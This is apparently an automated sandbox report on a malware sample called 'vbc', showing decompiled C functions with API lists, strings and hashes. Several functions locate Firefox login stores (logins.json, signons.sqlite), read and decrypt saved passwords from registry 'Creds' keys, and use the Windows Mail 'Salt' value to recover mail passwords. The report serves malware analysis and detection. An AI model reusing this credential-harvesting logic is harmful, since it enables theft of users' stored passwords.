                                                                                                                                                                        					_t37 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                                                                                                                                        					 *(_t47 + 0x18c) = _t37;
                                                                                                                                                                        					 *_t44(_t37, 1);
                                                                                                                                                                        					SendMessageA( *(_t47 + 0x184), 0x1003, 1,  *(_t47 + 0x18c));
                                                                                                                                                                        				}
                                                                                                                                                                        				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
                                                                                                                                                                        					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
                                                                                                                                                                        					 *(_t47 + 0x190) = _t34;
                                                                                                                                                                        					 *_t44(_t34, 1);
                                                                                                                                                                        					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
                                                                                                                                                                        				}
                                                                                                                                                                        				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
                                                                                                                                                                        				 *(_t47 + 0x188) = _t21;
                                                                                                                                                                        				 *_t44(_t21, 2);
                                                                                                                                                                        				_v36 = LoadImageA( *0x417b94, 0x85, 0, 0x10, 0x10, 0x1000);
                                                                                                                                                                        				_t24 = LoadImageA( *0x417b94, 0x86, 0, 0x10, 0x10, 0x1000);
                                                                                                                                                                        				_t42 = _t24;
                                                                                                                                                                        				 *_t44( *(_t47 + 0x188), 0);
                                                                                                                                                                        				_t26 = GetSysColor(0xf);
                                                                                                                                                                        				_v40 = _t26;
                                                                                                                                                                        				ImageList_AddMasked( *(_t47 + 0x188), _v44, _t26);
                                                                                                                                                                        				ImageList_AddMasked( *(_t47 + 0x188), _t42, _v40);
                                                                                                                                                                        				DeleteObject(_v56);
                                                                                                                                                                        				DeleteObject(_t42);
                                                                                                                                                                        				return SendMessageA(E004049F1( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040A05B
                                                                                                                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 0040A066
                                                                                                                                                                        • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040A07B
                                                                                                                                                                        • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040A090
                                                                                                                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 0040A09B
                                                                                                                                                                        • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040A0B0
                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040A0BC
                                                                                                                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 0040A0C7
                                                                                                                                                                        • LoadImageA.USER32 ref: 0040A0E5
                                                                                                                                                                        • LoadImageA.USER32 ref: 0040A101
                                                                                                                                                                        • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040A10D
                                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 0040A111
                                                                                                                                                                        • ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 0040A12C
                                                                                                                                                                        • ImageList_AddMasked.COMCTL32(?,00000000,?), ref: 0040A139
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0040A145
                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0040A148
                                                                                                                                                                        • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040A166
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Image$List_$Count$CreateMessageSend$DeleteLoadMaskedObject$Color
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3411798969-0
                                                                                                                                                                        • Opcode ID: 1bd64ef7cf6ebfbe1216c8ae3712fe611673920fae5758317d27ef3baf5e7dda
                                                                                                                                                                        • Instruction ID: 418605dbbba7a2bdca51e359c3d30d4779c94778b6a4b101a6c03afd9e8c1dd7
                                                                                                                                                                        • Opcode Fuzzy Hash: 1bd64ef7cf6ebfbe1216c8ae3712fe611673920fae5758317d27ef3baf5e7dda
                                                                                                                                                                        • Instruction Fuzzy Hash: F13121716803087EFA316B709C47FD6BB95EB48B05F104829F3956A1E1CAF279909B18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			E0040D7C1(intOrPtr* __eax, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                        				void _v267;
                                                                                                                                                                        				char _v268;
                                                                                                                                                                        				void _v531;
                                                                                                                                                                        				char _v532;
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t45;
                                                                                                                                                                        				int _t54;
                                                                                                                                                                        				int _t60;
                                                                                                                                                                        				char* _t63;
                                                                                                                                                                        				void* _t65;
                                                                                                                                                                        				void* _t67;
                                                                                                                                                                        				void* _t72;
                                                                                                                                                                        				char* _t73;
                                                                                                                                                                        				void* _t82;
                                                                                                                                                                        				int _t91;
                                                                                                                                                                        				char* _t97;
                                                                                                                                                                        				void* _t100;
                                                                                                                                                                        				void* _t104;
                                                                                                                                                                        				void* _t105;
                                                                                                                                                                        				void* _t106;
                                                                                                                                                                        				void* _t120;
                                                                                                                                                                        				intOrPtr* _t121;
                                                                                                                                                                        				void* _t125;
                                                                                                                                                                        				char** _t126;
                                                                                                                                                                        				char** _t127;
                                                                                                                                                                        
                                                                                                                                                                        				_t120 = __edx;
                                                                                                                                                                        				_t121 = __eax;
                                                                                                                                                                        				_t45 = E00406C5E(__eax + 0x1c, __eax, __eflags, _a4);
                                                                                                                                                                        				_t130 = _t45;
                                                                                                                                                                        				if(_t45 == 0) {
                                                                                                                                                                        					__eflags = 0;
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				E00404638(_t121 + 0x468);
                                                                                                                                                                        				E00406209(_t121 + 0x158, _a4);
                                                                                                                                                                        				_t97 = _t121 + 0x25d;
                                                                                                                                                                        				 *_t97 = 0;
                                                                                                                                                                        				E0040C70B(_t130, _t121 + 0x18);
                                                                                                                                                                        				if( *_t97 == 0) {
                                                                                                                                                                        					_t91 = strlen(_t121 + 0x158);
                                                                                                                                                                        					 *_t126 = "signons.txt";
                                                                                                                                                                        					_t10 = strlen(??) + 1; // 0x1
                                                                                                                                                                        					if(_t91 + _t10 >= 0x104) {
                                                                                                                                                                        						 *((char*)(_t121 + 0x25d)) = 0;
                                                                                                                                                                        					} else {
						E004062B7(_t121 + 0x25d, _t121 + 0x158, "signons.txt");
					}
				}
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t127 =  &(_t126[3]);
				_t54 = strlen(_t121 + 0x158);
				 *_t127 = "signons.sqlite";
				_t18 = strlen(??) + 1; // 0x1
				if(_t54 + _t18 >= 0x104) {
					_v268 = 0;
				} else {
					E004062B7( &_v268, _t121 + 0x158, "signons.sqlite");
				}
				_v532 = 0;
				memset( &_v531, 0, 0x104);
				_t60 = strlen(_t121 + 0x158);
				_t127[3] = "logins.json";
				_t26 = strlen(??) + 1; // 0x1
				_pop(_t104);
				if(_t60 + _t26 >= 0x104) {
					_v532 = 0;
				} else {
					E004062B7( &_v532, _t121 + 0x158, "logins.json");
					_pop(_t104);
				}
				_t63 = _t121 + 0x25d;
				_t135 =  *_t63;
				if( *_t63 != 0) {
					_t82 = E00406C5E(_t121 + 4, _t121, _t135, _t63);
					_t136 = _t82;
					if(_t82 != 0) {
						E0040C656(_t104, _t121, _t136);
					}
				}
				_t65 = E00406155( &_v268);
				_t137 = _t65;
				_pop(_t105);
				if(_t65 != 0) {
					E0040D3B5(_t105, _t137, _t121,  &_v268);
				}
				_t67 = E00406155( &_v532);
				_t138 = _t67;
				_pop(_t106);
				if(_t67 != 0) {
					E0040D003(_t106, _t120, _t138, _t121,  &_v532);
				}
				_t100 = 0;
				if( *((intOrPtr*)(_t121 + 0x474)) <= 0) {
					L24:
					return 1;
				} else {
					do {
						_t125 = E0040DA96(_t100, _t121 + 0x468);
						_t38 = _t125 + 0x504; // 0x504
						_t72 = _t38;
						_push("none");
						_push(_t72);
						L00412072();
						if(_t72 != 0) {
							_t39 = _t125 + 4; // 0x4
							_t73 = _t39;
							if( *_t73 == 0) {
								_t40 = _t125 + 0x204; // 0x204
								strcpy(_t73, _t40);
							}
							 *((intOrPtr*)( *_t121 + 4))(_t125);
						}
						_t100 = _t100 + 1;
					} while (_t100 <  *((intOrPtr*)(_t121 + 0x474)));
					goto L24;
				}
			}

Instruction addresses (the report's per-line address column for this function; the line-by-line alignment was lost in extraction): 0x0040d7c1, 0x0040d7d0, 0x0040d7d5, 0x0040d7da, 0x0040d7dc, 0x0040d9cf, 0x00000000, 0x0040d9cf, 0x0040d7e8, 0x0040d7f6, 0x0040d7ff, 0x0040d806, 0x0040d809, 0x0040d816, 0x0040d81f, 0x0040d826, 0x0040d832, 0x0040d839, 0x0040d856, 0x0040d83b, 0x0040d84d, 0x0040d853, 0x0040d839, 0x0040d867, 0x0040d86e, 0x0040d879, 0x0040d87d, 0x0040d884, 0x0040d890, 0x0040d897, 0x0040d8b4, 0x0040d899, 0x0040d8ab, 0x0040d8b1, 0x0040d8c5, 0x0040d8cc, 0x0040d8db, 0x0040d8e2, 0x0040d8ee, 0x0040d8f4, 0x0040d8f5, 0x0040d912, 0x0040d8f7, 0x0040d909, 0x0040d90f, 0x0040d90f, 0x0040d919, 0x0040d91f, 0x0040d922, 0x0040d928, 0x0040d92d, 0x0040d92f, 0x0040d931, 0x0040d931, 0x0040d92f, 0x0040d93d, 0x0040d942, 0x0040d944, 0x0040d945, 0x0040d94f, 0x0040d94f, 0x0040d95b, 0x0040d960, 0x0040d962, 0x0040d963, 0x0040d96d, 0x0040d96d, 0x0040d972, 0x0040d97a, 0x0040d9ca, 0x00000000, 0x0040d97c, 0x0040d97c, 0x0040d989, 0x0040d98b, 0x0040d98b, 0x0040d991, 0x0040d996, 0x0040d997, 0x0040d9a0, 0x0040d9a2, 0x0040d9a2, 0x0040d9a8, 0x0040d9aa, 0x0040d9b2, 0x0040d9b8, 0x0040d9be, 0x0040d9be, 0x0040d9c1, 0x0040d9c2, 0x00000000, 0x0040d97c

APIs
  • Part of subcall function 00406C5E: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D7DA,?,?,?,?), ref: 00406C77
  • Part of subcall function 00406C5E: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406CA3
  • Part of subcall function 00404638: free.MSVCRT(00000000,0040BE16), ref: 0040463F
  • Part of subcall function 00406209: strcpy.MSVCRT(?,?,0040D7FB,?,?,?,?,?), ref: 0040620E
  • Part of subcall function 00406209: strrchr.MSVCRT ref: 00406216
  • Part of subcall function 0040C70B: memset.MSVCRT ref: 0040C72C
  • Part of subcall function 0040C70B: memset.MSVCRT ref: 0040C740
  • Part of subcall function 0040C70B: memset.MSVCRT ref: 0040C754
  • Part of subcall function 0040C70B: memcpy.MSVCRT ref: 0040C821
  • Part of subcall function 0040C70B: memcpy.MSVCRT ref: 0040C881
• strlen.MSVCRT ref: 0040D81F
• strlen.MSVCRT ref: 0040D82D
• memset.MSVCRT ref: 0040D86E
• strlen.MSVCRT ref: 0040D87D
• strlen.MSVCRT ref: 0040D88B
• memset.MSVCRT ref: 0040D8CC
• strlen.MSVCRT ref: 0040D8DB
• strlen.MSVCRT ref: 0040D8E9
• _stricmp.MSVCRT(00000504,none,?,?,?,?,?,?), ref: 0040D997
• strcpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040D9B2
  • Part of subcall function 004062B7: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062BF
  • Part of subcall function 004062B7: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062CE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strlen$memset$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
                                                                                                                                                                        • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                        • API String ID: 1405107918-3138536805
                                                                                                                                                                        • Opcode ID: dc38bddda9e42b5c5320f9286ff75ddff83acf33bc21f5fa31688107119b79d7
                                                                                                                                                                        • Instruction ID: d07004e2ff50c5cd41ef2cdd6425adcf976a56e41a8fa9a3887142b7f0986be6
                                                                                                                                                                        • Opcode Fuzzy Hash: dc38bddda9e42b5c5320f9286ff75ddff83acf33bc21f5fa31688107119b79d7
                                                                                                                                                                        • Instruction Fuzzy Hash: B051E3B2904145AED714EBE0CC85BDAB7ACAF41305F10057BE159E21C2EB78AAD98B5C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 70%
E0040BA21(signed int __eax, void* __esi) {
	void* _t5;
	void* _t6;
	void* _t7;
	void* _t8;
	void* _t9;
	void* _t10;

	_push("/shtml");
	L00412072();
	if(__eax != 0) {
		_push("/sverhtml");
		L00412072();
		if(__eax != 0) {
			_push("/sxml");
			L00412072();
			if(__eax != 0) {
				_push("/stab");
				L00412072();
				if(__eax != 0) {
					_push("/scomma");
					L00412072();
					if(__eax != 0) {
						_push("/stabular");
						L00412072();
						if(__eax != 0) {
							_push("/skeepass");
							L0041207E();
							asm("sbb eax, eax");
							return ( ~__eax & 0xfffffff8) + 8;
						} else {
							_t5 = 3;
							return _t5;
						}
					} else {
						_t6 = 7;
						return _t6;
					}
				} else {
					_t7 = 2;
					return _t7;
				}
			} else {
				_t8 = 6;
				return _t8;
			}
		} else {
			_t9 = 5;
			return _t9;
		}
	} else {
		_t10 = 4;
		return _t10;
	}
}

APIs
• _stricmp.MSVCRT(/shtml,0041344F,0040BB20,?,00000000,00000000,?,?,?,0040BCA6), ref: 0040BA27
• _stricmp.MSVCRT(/sverhtml,0041344F,0040BB20,?,00000000,00000000,?,?,?,0040BCA6), ref: 0040BA3C
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: _stricmp
• String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
• API String ID: 2884411883-1959339147
• Opcode ID: b70f27fc5aecc47ba7919a44c3d765b9763ae409b21ddab941f54064ab36d7b0
• Instruction ID: 9cc75f2135a457fb5b155108ec4f1482e5c4f70433a9f240ecae405c43e57cbb
• Opcode Fuzzy Hash: b70f27fc5aecc47ba7919a44c3d765b9763ae409b21ddab941f54064ab36d7b0
• Instruction Fuzzy Hash: 0401DE7238A31128F934A1A63E17BD30A44CBE1B7AF30465BF555E41C1EF9D949094AC
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
E0040F8B4(intOrPtr _a4, intOrPtr _a8, char _a12, char _a16, intOrPtr _a20) {
	void _v259;
	char _v260;
	void _v515;
	char _v516;
	void _v771;
	char _v772;
	void _v1027;
	char _v1028;
	char _v1284;
	char _v2308;
	char _t47;
	intOrPtr* _t50;
	void* _t57;
	intOrPtr* _t73;
	void* _t76;
	void* _t77;
	void* _t78;
	void* _t79;

	_v1028 = 0;
	memset( &_v1027, 0, 0xfe);
	_v772 = 0;
	memset( &_v771, 0, 0xfe);
	_v516 = 0;
	memset( &_v515, 0, 0xfe);
	_t77 = _t76 + 0x24;
	if(_a16 != 0xffffffff) {
		sprintf( &_v1028, " bgcolor=\"%s\"", E0040F6E2(_a16,  &_v1284));
                                                                                                                                                                        					_t77 = _t77 + 0x14;
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_a20 != 0xffffffff) {
                                                                                                                                                                        					sprintf( &_v772, "<font color=\"%s\">", E0040F6E2(_a20,  &_v1284));
                                                                                                                                                                        					strcpy( &_v516, "</font>");
                                                                                                                                                                        					_t77 = _t77 + 0x1c;
                                                                                                                                                                        				}
                                                                                                                                                                        				sprintf( &_v2308, "<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n",  &_v1028);
                                                                                                                                                                        				E00405F07(_a4,  &_v2308);
                                                                                                                                                                        				_t47 = _a12;
                                                                                                                                                                        				_t78 = _t77 + 0x14;
                                                                                                                                                                        				if(_t47 > 0) {
                                                                                                                                                                        					_t73 = _a8 + 4;
                                                                                                                                                                        					_a16 = _t47;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_v260 = 0;
                                                                                                                                                                        						memset( &_v259, 0, 0xfe);
                                                                                                                                                                        						_t50 =  *_t73;
                                                                                                                                                                        						_t79 = _t78 + 0xc;
                                                                                                                                                                        						if( *_t50 == 0) {
                                                                                                                                                                        							_v260 = 0;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							sprintf( &_v260, " width=\"%s\"", _t50);
                                                                                                                                                                        							_t79 = _t79 + 0xc;
                                                                                                                                                                        						}
                                                                                                                                                                        						sprintf( &_v2308, "<th%s>%s%s%s\r\n",  &_v260,  &_v772,  *((intOrPtr*)(_t73 - 4)),  &_v516);
                                                                                                                                                                        						_t57 = E00405F07(_a4,  &_v2308);
                                                                                                                                                                        						_t78 = _t79 + 0x20;
                                                                                                                                                                        						_t73 = _t73 + 8;
                                                                                                                                                                        						_t34 =  &_a16;
                                                                                                                                                                        						 *_t34 = _a16 - 1;
                                                                                                                                                                        					} while ( *_t34 != 0);
                                                                                                                                                                        					return _t57;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t47;
                                                                                                                                                                        			}





















Instruction addresses for the listing above: 0x0040f8cf - 0x0040fa2a.

APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: sprintf$memset$strcpy
• String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
• API String ID: 898937289-3842416460
• Opcode ID: 545e006f70f27d5e232efb2f2e670bdaa3235a9e542d9c48a27740188541449b
• Instruction ID: e1dfaf3f0aab17dcf8878a0a22dd94d4c671af1ddc0a59b8f6102d88430d0a7a
• Opcode Fuzzy Hash: 545e006f70f27d5e232efb2f2e670bdaa3235a9e542d9c48a27740188541449b
• Instruction Fuzzy Hash: F94133B2C4111D6EDB21DA54CD41FEB776CEF54348F0401BBB618E2142E2789F988F69
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E0040DD59(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, char _a12, void* _a16) {
                                                                                                                                                                        				int _v8;
                                                                                                                                                                        				int _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				short* _v20;
                                                                                                                                                                        				int _v24;
                                                                                                                                                                        				char* _v28;
                                                                                                                                                                        				char _v32;
                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                        				char _v40;
                                                                                                                                                                        				int _v44;
                                                                                                                                                                        				void _v299;
                                                                                                                                                                        				char _v300;
                                                                                                                                                                        				char _v556;
                                                                                                                                                                        				char _v812;
                                                                                                                                                                        				char _v4908;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				long _t46;
                                                                                                                                                                        				int* _t84;
                                                                                                                                                                        				char* _t85;
                                                                                                                                                                        
                                                                                                                                                                        				E00412360(0x132c, __ecx);
                                                                                                                                                                        				_t1 =  &_a16; // 0x40e170
                                                                                                                                                                        				_t84 = 0;
                                                                                                                                                                        				_t2 =  &_a16; // 0x40e170
                                                                                                                                                                        				_t46 = RegOpenKeyExA( *_t2, "Creds", 0, 0x20019, _t1);
                                                                                                                                                                        				if(_t46 != 0) {
                                                                                                                                                                        					return _t46;
                                                                                                                                                                        				}
                                                                                                                                                                        				_v300 = _t46;
                                                                                                                                                                        				memset( &_v299, 0, 0xff);
                                                                                                                                                                        				_push(0xff);
                                                                                                                                                                        				_push( &_v300);
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				while(RegEnumKeyA(_a16, ??, ??, ??) == 0) {
                                                                                                                                                                        					if(RegOpenKeyExA(_a16,  &_v300, _t84, 0x20019,  &_v16) == 0) {
                                                                                                                                                                        						_v12 = 0x1000;
                                                                                                                                                                        						if(RegQueryValueExA(_v16, "ps:password", _t84,  &_v44,  &_v4908,  &_v12) == 0) {
                                                                                                                                                                        							_v32 = _v12;
                                                                                                                                                                        							_v28 =  &_v4908;
                                                                                                                                                                        							_v40 = _a12;
                                                                                                                                                                        							_v36 = _a8;
                                                                                                                                                                        							if(E0040481B(_a4 + 0xc,  &_v32,  &_v40,  &_v24) != 0) {
                                                                                                                                                                        								_t85 =  &_v812;
					_v812 = 0;
					_v556 = 0;
					E004060DA(0xff, _t85,  &_v300);
					WideCharToMultiByte(0, 0, _v20, _v24,  &_v556, 0xff, 0, 0);
					 *((intOrPtr*)( *_a4))(_t85);
					LocalFree(_v20);
					_t84 = 0;
				}
			}
			RegCloseKey(_v16);
		}
		_v8 = _v8 + 1;
		_push(0xff);
		_push( &_v300);
		_push(_v8);
	}
	return RegCloseKey(_a16);
}

APIs
• RegOpenKeyExA.ADVAPI32(p@,Creds,00000000,00020019,p@,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040E170,?,?,?,?), ref: 0040DD83
• memset.MSVCRT ref: 0040DDA1
• RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040DDCE
• RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?,?,?), ref: 0040DDF7
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,?,00000000,000000FF,00000000,00000000), ref: 0040DE70
• LocalFree.KERNEL32(00000001), ref: 0040DE83
• RegCloseKey.ADVAPI32(?), ref: 0040DE8E
• RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040DEA5
• RegCloseKey.ADVAPI32(?), ref: 0040DEB6
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
• String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password$p@
• API String ID: 551151806-2386532916
• Opcode ID: 802061c58ab3b7a0c699a15447d727f2b4d3045fa72b958aab0169898b6b1aff
• Instruction ID: 9b96f835ed6997495325440ed53231f0f0ace883948e60a6f3a7b66043991938
• Opcode Fuzzy Hash: 802061c58ab3b7a0c699a15447d727f2b4d3045fa72b958aab0169898b6b1aff
• Instruction Fuzzy Hash: 61410676900219AFDB11DFA5DC84EEFBBBCEB48755F0040A6F905E2150DA34AB948B64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040E74B() {
	void* _t1;
	int _t2;
	struct HINSTANCE__* _t4;

	if( *0x418518 != 0) {
		return _t1;
	}
	_t2 = LoadLibraryA("psapi.dll");
	_t4 = _t2;
	if(_t4 == 0) {
		L10:
		return _t2;
	} else {
		_t2 = GetProcAddress(_t4, "GetModuleBaseNameA");
		 *0x417fec = _t2;
		if(_t2 != 0) {
			_t2 = GetProcAddress(_t4, "EnumProcessModules");
			 *0x417fe4 = _t2;
			if(_t2 != 0) {
				_t2 = GetProcAddress(_t4, "GetModuleFileNameExA");
				 *0x417fdc = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "EnumProcesses");
					 *0x41810c = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "GetModuleInformation");
						 *0x417fe8 = _t2;
						if(_t2 != 0) {
							 *0x418518 = 1;
						}
					}
				}
			}
		}
		if( *0x418518 == 0) {
			_t2 = FreeLibrary(_t4);
		}
		goto L10;
	}
}

APIs
• LoadLibraryA.KERNEL32(psapi.dll,?,0040E370), ref: 0040E75E
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E777
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E788
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E799
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E7AA
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E7BB
• FreeLibrary.KERNEL32(00000000), ref: 0040E7DB
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
• API String ID: 2449869053-232097475
• Opcode ID: 84e491b4529d3412f2215207142cb03e9d322bcacbabb572ff9b82cad9202ccb
• Instruction ID: 4da247ea616dd2a72ab7006308dc9c89d3535959c96c16615461c58e29f3e28a
• Opcode Fuzzy Hash: 84e491b4529d3412f2215207142cb03e9d322bcacbabb572ff9b82cad9202ccb
• Instruction Fuzzy Hash: B8012530645211AAC711DB266C81FA73DF99B85B80F15843FF400F2694DB7CC5529A6C
                                                                                                                                                                        Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%
E00410BCE(char* __eax, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
	char _v6;
	char _v7;
	char _v8;
	int _v12;
	intOrPtr _v16;
	void* _v20;
	short* _v24;
	unsigned int _v28;
	char* _v32;
	int _v36;
	intOrPtr _v40;
	signed int _v44;
	void _v299;
	char _v300;
	void _v555;
	char _v556;
	char _v1080;
	void* __esi;
	int _t56;
	intOrPtr _t58;
	intOrPtr _t64;
	char _t92;
	char* _t93;
	void* _t100;
	signed int _t102;
	signed int _t107;
	intOrPtr _t108;
	void* _t113;

	_t113 = __eflags;
	_t100 = __edx;
	_t93 = __eax;
	E004046E1( &_v1080);
	if(E004047AA( &_v1080, _t113) != 0) {
		_t56 = strlen(_t93);
		asm("cdq");
		_t107 = _t56 - _t100 >> 1;
		_t2 = _t107 + 1; // 0x1
		_t58 = _t2;
		L00412090();
		_t102 = 0;
		_t96 = _t58;
		_v16 = _t58;
		if(_t107 > 0) {
			do {
				_v8 =  *((intOrPtr*)(_t93 + _t102 * 2));
				_v7 = _t93[1 + _t102 * 2];
				_v6 = 0;
				_t92 = E00406541( &_v8);
				_t96 = _v16;
				 *((char*)(_t102 + _v16)) = _t92;
				_t102 = _t102 + 1;
			} while (_t102 < _t107);
		}
		_v556 = 0;
		memset( &_v555, 0, 0xff);
		_v12 = 0;
		_v300 = 0;
		memset( &_v299, 0, 0xfe);
		_t64 =  *((intOrPtr*)(_a4 + 0x86c));
		if(_t64 != 1) {
			__eflags = _t64 - 2;
			if(_t64 == 2) {
				_push("Software\\Microsoft\\Windows Live Mail");
				goto L7;
			}
		} else {
			_push("Software\\Microsoft\\Windows Mail");
			L7:
			strcpy( &_v300, ??);
			_pop(_t96);
		}
		if(E0040F1B0(0x80000001,  &_v300,  &_v20) == 0) {
			_v12 = 0xff;
			E0040F214(_t96, _v20, "Salt",  &_v556,  &_v12);
			RegCloseKey(_v20);
		}
		_v40 = _v16;
		_v36 = _v12;
		_v32 =  &_v556;
		_v44 = _t107;
		if(E0040481B( &_v1080,  &_v44,  &_v36,  &_v28) != 0) {
			_t108 = _a8;
			WideCharToMultiByte(0, 0, _v24, _v28 >> 1, _t108 + 0x400, 0xff, 0, 0);
			(_t108 + 0x400)[_v28 >> 1] = 0;
			LocalFree(_v24);
		}
		_push(_v16);
		L00412096();
	}
	return E004047FB( &_v1080);
}

APIs
  • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
  • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,73AFF420), ref: 004047B2
  • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
• strlen.MSVCRT ref: 00410BF5
• ??2@YAPAXI@Z.MSVCRT ref: 00410C05
• memset.MSVCRT ref: 00410C51
• memset.MSVCRT ref: 00410C6E
• strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00410C9C
